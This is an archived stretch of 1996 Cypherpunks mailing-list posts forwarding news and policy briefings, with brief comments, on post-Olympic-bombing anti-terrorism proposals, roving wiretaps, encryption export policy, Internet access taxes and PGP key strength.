>   say they are responding to a greater number of calls -- and, in Los
>   Angeles County, finding a greater number of explosive devices.
   
>   A Sheriff's Department spokesman said 178 potentially explosive
>   devices have been found in the county out of a total of 273 calls
>   answered in the first six months of this year.
   
>   By contrast, only 86 such devices were found out of 259 calls in the
>   first half of 1995.

[...]
   
>   "We're going to top 70 for the month -- that is a record in this
>   unit," Spencer said. "And the actual devices that really cause damage
>   has gone up."
   
>   Among devices found by sheriff's deputies: nine pipe bombs, 53 pieces
>   of military ordnance, 44 Molotov cocktails, 12 fireworks-pyrotechnic
>   devices, two acid bombs and five dry ice bombs.
   
>   In the city, the Los Angeles Police Department's bomb squad responded
>   to 972 calls in 1995 -- up from 717 in 1994.
   
>   Of those calls last year, 181 were for either fireworks, ordnance or
>   other potentially threatening items, police said.
   
>   The squad destroyed 73 devices and investigated 41 explosions -- many
>   in mailboxes -- that occurred over the year. Most calls, however, were
>   for suspicious packages that turned out to be harmless.
   
>   "We have had an excessive amount of bomb calls on the heels of the
>   pipe bombing in Atlanta," said Lt. Tony Alba, an LAPD spokesman. "They
>   have been running around like crazy ever since the Atlanta incident, a
>   lot of suspicious package calls."
   
[...]

>   Also on Wednesday, 55 miles north of downtown Los Angeles in
>   Lancaster, the sheriff's bomb squad was summoned to the parking lot at
>   an Elks Lodge where deputies found a homemade device -- which included
>   half-sticks of dynamite and BBs.
   
[...]

>   And Monday, an Ensenada, Mexico-bound Carnival cruise ship, filled
>   with 1,846 passengers, was forced to turn around and head back to port
>   after a bomb threat was made. No bomb was found.
   
>   "To some it is a power thing," said Sgt. Al Humphries of the Sheriff's
>   Department bomb squad. "With 20 cents and a mean spirit you can make a
>   cruise ship turn around, or make an airplane turn back."
   
>   Spencer and security experts agree media attention that focused on
>   bombs in the aftermath of the Centennial Olympic Park and TWA
>   explosions have factored into the flurry of threats and reported
>   suspicious packages.
   
>   William Daly, managing director at Kroll Associates, a New York-based
>   security firm, said the activity will diminish as the spotlight fades.
   
>   "If you look after the World Trade Center bombing, there was a
>   dramatic increase the next day, unfortunately tied to the attention on
>   the issue," Daly said.
   
>   "These people who are on the fringe, they enjoy seeing emergency
>   service, knowing that it is going to disrupt a city," he said. "This
>   is the way they live out their fantasy. The more they see it being
>   received and responded to, the more it will continue."
   
[...]
  
>   Spencer said information about bomb-making on the Internet may be the
>   answer to the greater numbers of actual devices being made.
   
>   "This information is readily available on the Internet," he said.
>   "What we've noticed is that a lot of juveniles have gotten the
>   information off the Internet -- they admit it."
   
>   Alba said the most common devices found by the LAPD are pipe bombs and
>   dry ice bombs, often used to blow up mailboxes.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 06:51:35 +0800
To: cypherpunks@toad.com
Subject: Three on Clinton, one not crypto-related but positive
Message-ID: <01I7RL42XWAO8Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This first one is about as expected. I'm disappointed in Gingrich for
being so conciliatory, and not pointing out (as the person from the ACLU did)
that there's no evidence whatsoever that such expanded governmental powers
would have done anything to stop the TWA (possible) bombing - and evidence that
it would do nothing whatsoever to stop events like the Olympic bombing.

>Clinton calls for expanded measures against terrorism

>   _(c) Copyright 1996 Nando.net_
   
>    New York Times
    
>   NEW ORLEANS -- Spurred by the bombing at the Atlanta Olympics,
>   President Clinton Sunday called on Congress to pass expanded measures
>   against terrorism -- including new federal wiretapping authority --
>   that were dropped from the anti-terrorism bill passed last spring.
   
>   Clinton called on the congressional leadership from both parties to
>   join him and the director of the FBI, Louis J. Freeh, at the White
>   House on Monday to discuss additional steps the government might take
>   to combat terrorism. Speaker Newt Gingrich expressed willingness to
>   consider such measures and said he believed some agreement could be
>   worked out.

[...]

>   Clinton originally proposed such markers, and expanded authority to
>   let the FBI wiretap suspected terrorists or groups who are moving from
>   place to place, after the Oklahoma City bombing in April 1995, but the
>   measures were among those that fell out of the final bill. In an
>   unusual alliance, civil liberties groups and advocates of gun rights
>   joined forces to argue that the wiretapping expansion, in particular,
>   would violate constitutional rights of privacy and free association.
   
[...]

>   Speaking Sunday morning on the NBC News program, "Meet the Press,"
>   Gingrich said there was "a possibility" of reaching an agreement on
>   both issues, given the bombing in Atlanta and the suspicions that a
>   bomb may have brought down Trans World Airlines Flight 800.
   
>   He said that he thought Congress should "re-approach" the issue of
>   wiretapping, and that questions concerning the chemical markers were
>   "going to be negotiated." The Olympic bomb, he said, "shows you why
>   people are looking at that particular solution."
   
>   "I believe that the more there is terrorism, the more pressure we're
>   under to find systematic ways to solve it," said Gingrich, who had
>   opposed the proposals on chemical markers and wiretapping when the
>   administration made them.
   
[...]

>   Clinton said the Group of 7 industrialized nations will meet on the
>   issue of terrorism in a few weeks. Announced at the summit of the
>   group in Lyons, France, last month, the meeting is intended to promote
>   international cooperation among police and intelligence agencies,
>   traditionally reluctant to share information, even among allies.
   
[...]

>   In an interview Sunday, Schumer said that law-enforcement agencies
>   needed to be able to obtain telephone records of both incoming and
>   outgoing calls of suspects in international terrorism cases; to
>   monitor communications over digital networks, to keep up with
>   criminals who may activate a new cellular phone every few days, and
>   otherwise to stay abreast of the communications revolution.
   
>   Schumer said Gingrich was among those who "did everything they could
>   to weaken the bill" the first time it was passed. "Any time the NRA or
>   any of these far right groups sneezed, they jumped," he said.
   
>   Gingrich suggested Sunday that he favored an approach that would allow
>   monitoring of a suspect's calls across any number of telephones, but
>   said that should not mean that any phone that happened to be used by a
>   suspect could be monitored when other people were using it.
   
>   Ever since the TWA flight went down shortly after its departure from
>   John F. Kennedy Airport on July 17, FBI agents have been using the
>   attendant publicity to press the case for broader wiretapping
>   authority. The chief FBI officer on the scene of the disaster, James
>   Kallstrom, has repeated this plea.
   
>   But there continues to be some resistance to some of these ideas in
>   Congress.
   
>   "We're not prepared to extend wiretapping," said Sen. Arlen Specter, a
>   Pennsylvania Republican, in an interview on the CNN program Evans &
>   Novak on Saturday. "There was a judgment made in the Congress that
>   we're prepared to give up that bit of security for that bit of
>   freedom. And I think that's a wise judgment."
   
>   Laura W. Murphy, the director of the Washington office of the American
>   Civil Liberties Union, said the FBI was using terrorism to bolster its
>   arguments for techniques that it really wants to use in more typical
>   criminal cases.
   
>   "The idea that these roving wiretaps are going to lead to new
>   developments in our ability to fight terrorism is a big myth," she
>   said.
   
>   She said that only a minute fraction of wiretaps involve crimes of
>   terrorism, and that the new types of wiretaps the FBI seeks are more
>   invasive and more likely to track innocent parties than the old kinds.
   
	This one is the promised positive one on Clinton.

>   Centura

>     OLYMPIC IRAQI WEIGHTLIFTER WHO CARRIED FLAG DEFECTS TO UNITED STATES

>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press
      
>   Ahmed said Iraqi officials had told the country's delegation to turn
>   their heads away from President Clinton while marching in the opening
>   ceremony because Clinton and former President Bush "wanted to destroy
>   Iraq."
   
>   "Everybody else in our group looked away from President Clinton. They
>   were not men. But I turned my head and looked at him and I could not
>   believe my eyes. He was standing and applauding for us," the Times
>   quoted Ahmed as saying. "I know that if the games were in Iraq, Saddam
>   Hussein would not clap for the U.S."
   

	And in this one, Clinton (like other politicians) gets angry at the
thought that they might have to take some of that responsibility that they all
keep talking about. (My suggestion is to remove sovreign immunity and allow
wrongfully prosecuted persons to sue officials for their court and other costs.
It would certainly decrease prosecutions to the absolute minimum.)
	-Allen

>  Avis

>              CLINTON'S TEMPER FLARES WHEN NEWS CONFERENCE STRAYS

>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   WASHINGTON (Aug 1, 1996 2:00 p.m. EDT) - President Clinton displayed a
>   fiery temper Thursday when at a news conference on the economy he was
>   asked about the White House travel office controversy and past drug
>   abuse by some staff members.
   
[...]

>   "There are a lot of people who were never charged with anything, much
>   less offering to plead guilty to anything, who have been dragooned and
>   pulled up and had thousands and tens of thousands of dollars of legal
>   expenses, who were completely innocent, but have been subject to
>   abject harassment.
   
>   "Are we going to pay their legal expenses, too. Are we going to pay
>   the legal expenses of every person in America who is ever acquitted of
>   an offense?" Clinton asked heatedly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 06:56:05 +0800
To: cypherpunks@toad.com
Subject: Again, disappointed in Gingrich
Message-ID: <01I7RL8DXKCK8Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Again, I'm disappointed in Gingrich. This amplifies the earlier
comments.
	-Allen

>Clinton, congressional leaders to meet on terrorism

>   _(c) Copyright 1996 Nando.net_
   
>    Associated Press
    
[...]

>   Gingrich, interviewed on NBC's "Meet the Press," said, "I think that
>   we should have a provision that allows us to recognize that we now
>   live in the age of the cellular telephone and allows us to track an
>   individual person" He said the taggant requirement was "a
>   possibility."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:39:04 +0800
To: cypherpunks@toad.com
Subject: Looks like they may actually pass something... hell.
Message-ID: <01I7RLJW5WHK8Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I had hoped that normal government incompetence would prevent them from
passing something. Well, there's still hope that it'll get clogged up, or that
the courts will toss it out - somehow I think they won't like the idea of
taps without a court order, for instance (giving up a judicial prerogative). I
am also somewhat puzzled by the racketeering law reference - I had thought that
federal racketeering laws allowed civil forfeiture sans conviction (shudder)?
The "funding" for telephone companies sounds suspiciously like funding Digital
Telephony.
	-Allen

>   School House
   
>         WHITE HOUSE, KEY LAWMAKERS AGREE ON ANTI-TERRORISM PROPOSALS

>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press
      
>   WASHINGTON (Aug 1, 1996 09:53 a.m. EDT) -- After wrangling with key
>   Republican lawmakers, the White House has won agreement on a package
>   of anti-terrorism measures that would expand wiretapping authority and
>   tighten airport security.
   
[...]

>   But omitted from the agreement was a central part of Clinton's
>   proposals, a study of chemical markers in explosives, called taggants,
>   which had been heavily criticized by some Republicans. Also rejected
>   was a provision to allow the FBI to get information on suspected
>   terrorists from hotels, telephone companies and storage facilities.
   
[...]

   The agreement also would allow prosecution of suspected terrorists
   under federal racketeering laws, which would make anyone convicted
   subject to asset forfeitures and longer sentences.
   
>   The negotiators, led by Panetta and Sen. Larry Craig, R-Idaho, said
>   they hoped to have a package ready for a vote by week's end, before
>   Congress leaves for its August recess.
   
>   But Senate Majority Leader Trent Lott, R-Miss., said earlier in the
>   day that final passage before the recess appeared unlikely. "I don't
>   see how in the world we can get it done" by then, Lott told reporters.
   
>   Lott and other GOP leaders summoned Attorney General Janet Reno,
>   Panetta and FBI Director Louis Freeh to a meeting today to explain why
>   some of the FBI's anti-terrorism funds haven't been spent.
   
>   "We are increasingly concerned that monies and authorities already
>   granted to the administration are not being used effectively or at
>   all," Lott, House Speaker Newt Gingrich, R-Ga., and House Majority
>   Leader Dick Armey, R-Texas, wrote in a letter to Clinton.
   
>   Justice Department spokesman Myron Marlin said the Republican
>   assertions were "misleading."
   
>   Gingrich and Lott also proposed that a blue-ribbon commission review
>   the government's anti-terrorism policy -- a move that would delay
>   congressional action. The new package includes such a commission for
>   longer-term legislative proposals, Craig said.
   
>   He said the lawmakers' aides planned to work through the night to
>   draft the proposals into a package that could be put to a vote before
>   week's end.
   
>   "I feel very positive at this moment," Craig told reporters Wednesday
>   night.
   
>   Craig said the proposals included multipoint wiretaps, which allow law
>   enforcement agents to monitor all phone calls made by a suspected
>   terrorist, rather than just those from a specific telephone, as well
>   as emergency wiretaps, which are valid for 48 hours without a court
>   order.
   
[... yeah, right]

>   Craig stressed that the new wiretap provisions would include "some
>   privacy language that will protect people."
   
>   Other proposals on which accord was reached include the use of special
>   technology to make it easier to trace telephone numbers called by
>   suspected terrorists and a trust fund to reimburse phone companies for
>   expenses they incur in that area.
   
>   Craig listed the proposals but gave few details, which had yet to be
>   worked out.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:27:51 +0800
To: cypherpunks@toad.com
Subject: Republican convention security
Message-ID: <01I7RLOILMNG8Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Why am I not reassured by what convention Chuck Vance participated in
in the 1960's? And why do I suspect that the ADF calls a militia any group of
people who have a political viewpoint different from theirs and might be
armed (including via martial arts)?
	-Allen

>   Cobb Group - Netscape

>     SECURITY OUTSIDE THE CONVENTION HALLS IS FOCUS IN SAN DIEGO, CHICAGO

>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press
      
[...]

>   WASHINGTON (Aug 1, 1996 10:29 a.m. EDT) -- Beach parties, concerts and
>   fund-raisers will lure delegates from the air-conditioned halls of the
>   Republican and Democratic conventions next month, and officials say
>   keeping these off-site venues safe will be one of their biggest
>   challenges.
   
[...]

>   Convention security used to focus on foiling a lone individual bent on
>   disrupting the meeting, but now groups like anti-government militias
>   are more of a worry, said Chuck Vance. The former Secret Service agent
>   helped coordinate security for the 1968 Democratic meeting in Chicago
>   that was punctuated by anti-war protests.
   
[...]

>   Statistics give little reason for security planners to breath easy.
   
>   A recent study by the Anti-Defamation League said the number of
>   antigovernment militia groups in California jumped from two in 1994 to
>   35 last year.
   
>   And in San Diego County, one to five actual or suspected pipe bomb
>   incidents are reported every week, and a total of 32 hand grenade
>   incidents were reported in the first four months of this year, the
>   sheriff's department said. Six pipe bombs have exploded already this
>   year; there were seven in all of 1995. None were targeted at
>   government buildings.

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:30:00 +0800
To: cypherpunks@toad.com
Subject: More evidence that democracy is bunk
Message-ID: <01I7RLTJO3008Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	And some people think democracies secure civil liberties...
	-Allen

>Poll finds most Americans want broader authority to probe terrorism

>   _(c) Copyright 1996 Nando.net_
   
>    Associated Press
    
>   NEW YORK -- Americans overwhelmingly want the federal government to
>   have more authority to check out terrorist groups, according to a CBS
>   news poll released Tuesday.
   
[...]

>   As an antidote, 80 percent believe the federal government should have
>   more power to investigate terrorists, but just 52 percent believe
>   wiretaps should be expanded.
   
>   Three out of five said they still favor giving the government more
>   power even if that meant groups unrelated to terrorism were
>   investigated, too.
   
>   Even if it cost more, nearly nine out of 10 people surveyed want more
>   security checkpoints, guards and metal detectors -- and they'd be
>   willing to wait longer in lines -- at public events.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Fri, 2 Aug 1996 09:41:25 +0800
To: "'Jim Choate'" <ravage@EINSTEIN.ssz.com>
Subject: RE: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96 (fwd)
Message-ID: <01BB8041.12365200@ip95.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Here in Philippines, the government tax for connecting to the Internet, the percentage is 10%.


Forwarded message:

> Date: Wed, 31 Jul 1996 11:26:59 -0400
> From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
> Subject: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
>   	  				 
> >WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
> >Tacoma, Washington, has just gained the distinction of being the 
> >only municipality in the United States to tax Internet Access 
> >providers (IAPs) like telephone service providers. 
> >

Somebody needs to do their homework. Austin, TX has been taxing ISP's
for at least a year now. A recent Internet Provider meeting on this
issue resulted in a return to ISP's of a goodly amound of their taxes
because of various issues (read that I didn't go to meeting, I don't run an
ISP but a SOHO consultancy w/ Internet services).

> >The city of Tacoma has extended its six percent gross receipts tax on  
> >telecommunications services to include Internet services, Information 
> >Technology Association of America (ITAA) spokesperson Bob Cohen 
> >told Newsbytes. 

I have to pay the state 8.25% interest on any funds my customers deliver
to me.

> >If other cities attempted to follow Tacoma's lead in taxing IAPs,  
> >Miler said, it could cause the "Balkanization of the Internet, a 
> >hodgepodge of confusing, conflicting, and difficult to administer 
> >Internet tax rules and regulations. 

Agreed.

                                                       Jim Choate








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Fri, 2 Aug 1996 09:25:07 +0800
To: cypherpunks@toad.com
Subject: Re: Is 1024-bit PGP key enough?
In-Reply-To: <9608012108.AA17627@bart-savagewood.MIT.EDU>
Message-ID: <199608012238.PAA25123@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Somebody says:
>> Is security provided by 1024-bit PGP key sufficient against most powerful
>> computers that are available today? Say if smoe organization spent 10
>> billions of dollars on a cracking machine, would it be possible to crack 
>> the keys in reasonable time?

Derek Atkins <warlord@MIT.EDU> responds with some useful and authoritative
information -- thanks.

But the original author also needs to step back and understand his
security needs.  In particular, if you're trying to protect your
information against an enemy who is willing to spend $10B to get it,
they'll have a lot of options other than hiding in a back room with some
cracking equipment.  Would you be willing to sell them the information
you're trying to protect for (say) 10% of that $10B?  Would your partner?
Your wife?

	Jim Gillogly
	Hevensday, 9 Wedmath S.R. 1996, 22:37




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:58:36 +0800
To: cypherpunks@toad.com
Subject: CDT
Message-ID: <01I7RM0CJM388Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 29
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 29                        August 1, 1996

 CONTENTS: (1) Clinton Administration, Congress Propose Sweeping
               Anti-Terrorism Initiatives
           (2) How to Subscribe/Unsubscribe
           (3) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) CLINTON ADMINISTRATION, CONGRESS PROPOSE SWEEPING ANTI-TERRORISM
    INITIATIVES

In the wake of the recent bombing at the Olympics and the suspected
terrorist involvement in the TWA crash, the Clinton Administration and
members of Congress are proposing a set of sweeping counter-terrorism
initiatives. If enacted into law, these proposals will dramatically
increase law enforcement surveillance authority over the Internet and other
advanced communications technologies. An outline of the Administration's
proposal was circulated on Capitol Hill on Monday July 29.

President Clinton has urged Congress to pass new counter-terrorism
legislation before the Congressional recess at the end of this week.  While
several prominent Republican members of Congress, including House Speaker
Newt Gingrich (R-GA), have said publicly that Congress should not rush into
any new counter-terrorism legislation, most observers believe there is a
strong possibility that some or all of the Administration's proposal will
be enacted before the August recess.

The draft proposal contains several measures which were rejected by
Congress as part of the previous counter-terrorism initiative proposed
last year after the Oklahoma City bombing, as well as several new measures
including as-yet unspecified changes to U.S. encryption policy and funding
for the Communications Assistance for Law Enforcement Act (CALEA, a.k.a.
Digital Telephony).

CDT is concerned that the latest counter-terrorism efforts on Capitol Hill
are occurring without appropriate deliberation.  Major policy decisions
expanding the surveillance powers of law enforcement should not be made
without careful consideration of the necessity of such proposals and the
relative benefit to society. In the coming days and weeks, CDT will work
with Congressional leaders, privacy advocates, and the net.community to
ensure that constitutional civil liberties and the openness of the Internet
are protected as Congress considers counter-terrorism measures.
________________________________________________________________________

MAJOR POINTS OF THE COUNTER-TERRORISM PROPOSALS CIRCULATING ON THE HILL

The administration's new counter-terrorism initiative and other amendments
circulating this week in Congress contain numerous provisions, but four
are of particular concern to the net.community:

* New Threats to Encryption, Opposition to the Pro-CODE Bill
* Funding for Digital Telephony Without Public Accountability
* Amendment to Criminalize 'Bomb-Making' Information on the Internet
* Expanded Authority for Multi-Point, "Roving" Wiretaps

The full text of the Administration's proposal and background information
are available at CDT's counter-terrorism Web Page:

    http://www.cdt.org/policy/terrorism/

       --------------------------------------------------------

I. NEW THREATS TO ENCRYPTION, OPPOSITION TO THE PRO-CODE BILL

The Administration's outline contains the following statement on encryption:

 "* Encryption -- We will seek legislation to strengthen our ability to
    prevent terrorists from coming into the possession of the technology
    to encrypt their communications and data so that they are beyond the
    reach of law enforcement.  We oppose legislation that would eliminate
    current export barriers and encouraging the proliferation of encryption
    which blocks appropriate access to protect public safety and the
    national security."

While no specific legislative language has yet been proposed, this
represents the first statement by the Administration that they will seek
legislation to further restrict encryption.  Even more troubling, the
Administration is clearly attempting to use the recent suspected terrorist
incidents to push for a new and more restrictive encryption policy.

This new proposal comes as Congress is finally beginning to seriously
consider major changes in U.S. encryption policy. Bipartisan legislation
in both the House and Senate to relax encryption export controls is gaining
momentum.  The Senate Commerce Committee has held 3 hearings in the last 6
weeks, and is preparing to vote to send the Burns/Leahy "Pro-CODE" bill (S.
1726) to the floor of the Senate.  The Administration's attempt to leverage
the public's concern about terrorism to block passage of the Pro-CODE bill
is disturbing, and poses a significant threat to privacy and security on the
Internet.

CDT is working with members of Congress, privacy advocates, and the
communications and computer industries to oppose any attempt by the
Administration to impose new restrictions on encryption, and we continue to
work to move the bipartisan export relief legislation through Congress.

       --------------------------------------------------------

II. FUNDING FOR DIGITAL TELEPHONY WITHOUT PUBLIC ACCOUNTABILITY

The Administration is also seeking to override the public accountability
provisions of the Communications Assistance for Law Enforcement Act (CALEA
- a.k.a. 'Digital Telephony') by providing a funding for the law in a way
that prevents public oversight of the FBI's surveillance ability.

Enacted in October of 1994, granted law enforcement new authority to
influence the design of telecommunications networks (the Internet,
Commercial online services, and BBS's were exempted) in order to preserve
their ability to conduct court authorized electronic surveillance.

Congress balanced this new authority with a number of mechanisms to ensure
public accountability over law enforcement surveillance ability.
While complicated, the public accountability mechanisms are designed to
work as follows:

* Law enforcement provides telecommunications carriers, the Congress,
  and the public with notice of its surveillance capacity needs (i.e.,
  the number of simultaneous wiretaps in a given geographic location)
  with an opportunity for public comment.

* Based on an assessment of the reasonableness of the law enforcement
  surveillance capacity request, Congress appropriates money to cover
  the cost of modifications.  If Congress does not believe law
  enforcement has adequately justified its request, money will not be
  appropriated.

* Telecommunications carriers are not obligated to comply with the
  statute or make any capacity modifications without government
  reimbursement.

In October 1995, the FBI published its first notice of surveillance
capacity (see CDT Policy Post Vol. 1, No. 26).  The telecommunications
industry and privacy advocates used the public accountability provisions of
CALEA to respond to the FBI's request and argued that the FBI had not
adequately justified the extensive surveillance capability contained in the
request.  As a result, Congress has not yet appropriated funds and no
modifications have been made.

The FBI clearly believes that the public accountability provisions of CALEA
are working **too well**, and appears to be using the recent focus on
terrorism to push for a new funding mechanism which does not contain public
oversight.

CDT is fighting hard to ensure that the public accountability provisions of
CALEA, which have until now prevented the FBI from acquiring unnecessary
surveillance capacity, remain a part of the law, and will vigorously oppose
any effort by the FBI and the Clinton Administration to remove the last
opportunity for public oversight over law enforcement power.

       --------------------------------------------------------

III. THE AVAILABILITY OF 'BOMB-MAKING' INFORMATION ON THE INTERNET

Senator Dianne Feinstein (D-CA) has reintroduced an amendment to make it
illegal to disseminate information on how to construct explosives knowing
that the information will be used in furtherance of a federal crime.  The
amendment was adopted by the Senate earlier this month as part of a
Department of Defense Appropriations bill.  CDT believes that the vague
provisions of the Feinstein amendment could have a chilling effect on online
speech, needlessly duplicate existing criminal statutes, and should be
removed.

Feinstein first proposed the amendment as part of the 1995
counter-terrorism bill. The initial Feinstein amendment was extremely broad
and would have resulted in a flat ban on certain constitutionally protected
speech online.  After civil liberties advocates objected, Feinstein
narrowed her amendment substantially, although it was ultimately dropped
from the final terrorism bill signed in April 1996.

       --------------------------------------------------------

IV.  EXPANDED WIRETAP AUTHORITY

The Administration's proposal would also significantly expand current
wiretapping authority to allow multi-point (or "roving") wiretaps. This
would dramatically change surveillance authority to include wiretaps of
INDIVIDUALS instead of LOCATIONS.

This proposal would do away with the delicate balance between privacy and
law enforcement that Congress has struck over 30 years of wiretapping
legislation. Federal law has always required that wiretaps issue for a
specific location, to meet Fourth Amendment requirements. In 1986 Congress
introduced a narrow exception to this rule, only for cases where it could
be shown that the target was intentionally evading wiretaps by changing
facilities. The Administration proposal would completely remove this
standard, allowing so-called "roving taps" for any persons whose behavior
makes wiretapping difficult for law enforcement.

The administration proposed similar provisions in the spring of 1995 in the
wake of the Oklahoma City bombing. These provisions proved controversial in
Congress and were dropped from the final bill.

________________________________________________________________________

FOR MORE INFORMATION

For more information on the counter-terrorism proposals and their impact on
the Internet check out:

CDT's Counter-Terrorism Page:     http://www.cdt.org/policy/terrorism/
CDT's Encryption Policy Page:     http://www.cdt.org/crypto/
CDT's Digital Telephony Page:     http://www.cdt.org/digtel.html
Encryption Policy Resource Page:  http://www.crypto.com/

------------------------------------------------------------------------

(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.29                                             8/1/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:48:45 +0800
To: cypherpunks@toad.com
Subject: Progress on online stock markets
Message-ID: <01I7RM6OZWJK8Y4XOW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Anyone know how secure this company's web servers, etcetera are?
	-Allen

>   Avis

>                 E-TRADE WANTS TO SELL IPOS OVER THE INTERNET

>     Copyright &copy 1996 Nando.net
>     Copyright &copy 1996 San Francisco Examiner
      
>   SAN FRANCISCO (Aug 1, 1996 00:05 a.m. EDT) -- E-Trade Securities Inc.,
>   the Palo Alto, Calif., company that sells stocks over the Internet,
>   has asked the National Association of Securities Dealers for
>   permission to form an investment banking division to sell initial
>   public offerings over the Internet.
   
>   E-Trade executive vice president David Traversi said if the NASD
>   approves his request, the company would start bringing small firms
>   public and would also seek to co-underwrite big deals brought by large
>   investment banks.
   
>   Traversi said E-Trade's two-fold objective aimed to create a new way
>   to bring small companies public and give small investors a chance to
>   buy new stock issues that usually get bought by institutional
>   investors.

[...]

>   Traversi said E-Trade would also try to get listed as a co-underwriter
>   for big IPOs, like last September's Netscape offering. In the past,
>   small investors have complained that such big deals are sold to
>   institutional investors, who rake in huge profits before small
>   investors get a crack at the offering. To offer such deals online,
>   however, E-Trade would have to get the approval of the lead
>   underwriter on each offering.
   
>   "Right now, without naming names, there are large investment firms
>   that have indicated an interest in having us as a co-manager" of their
>   IPOs, Traversi said.
   
>   But before E-Trade can do anything more, its pending application to
>   form an investment bank has to be approved by the NASD, which
>   regulates small securities dealers. Traversi said he expected NASD
>   approval this fall.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Fri, 2 Aug 1996 08:19:15 +0800
To: cypherpunks@toad.com
Subject: Re: Brain Tennis with Dorthy
Message-ID: <2.2.32.19960801064418.006ccf7c@mail1.amaonline.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:59 AM 08/1/96 -0400, Duncan Frissell <frissell@panix.com> wrote:
>I'm following the Brain Tennis Match between Dorothy Denning and John
>Gilmore on encryption and the right to absolute privacy on Hot Wired
>(http://www.hotwired.com/braintennis/96/31/index0a.html).
>
>Were I a participant in this exercise, I would lob the following to Dorothy:
>

... <good questions excised> ...

One might wonder how Dorothy's opinions about privacy et al would change were it *her* communications/privacy/person at risk (be it through torture, GAK, etc.).

Were a government - duly elected - to come into power similar to that in 30's Germany or 70's Viet Nam, so that intellectuals or the educated became the targets of oppression, would she be as adamant about the perceived "rights" of Government to intrude in her private life, monitor her communications, and so on?

Inquiring minds want to know.... :-)

Dave Merriman

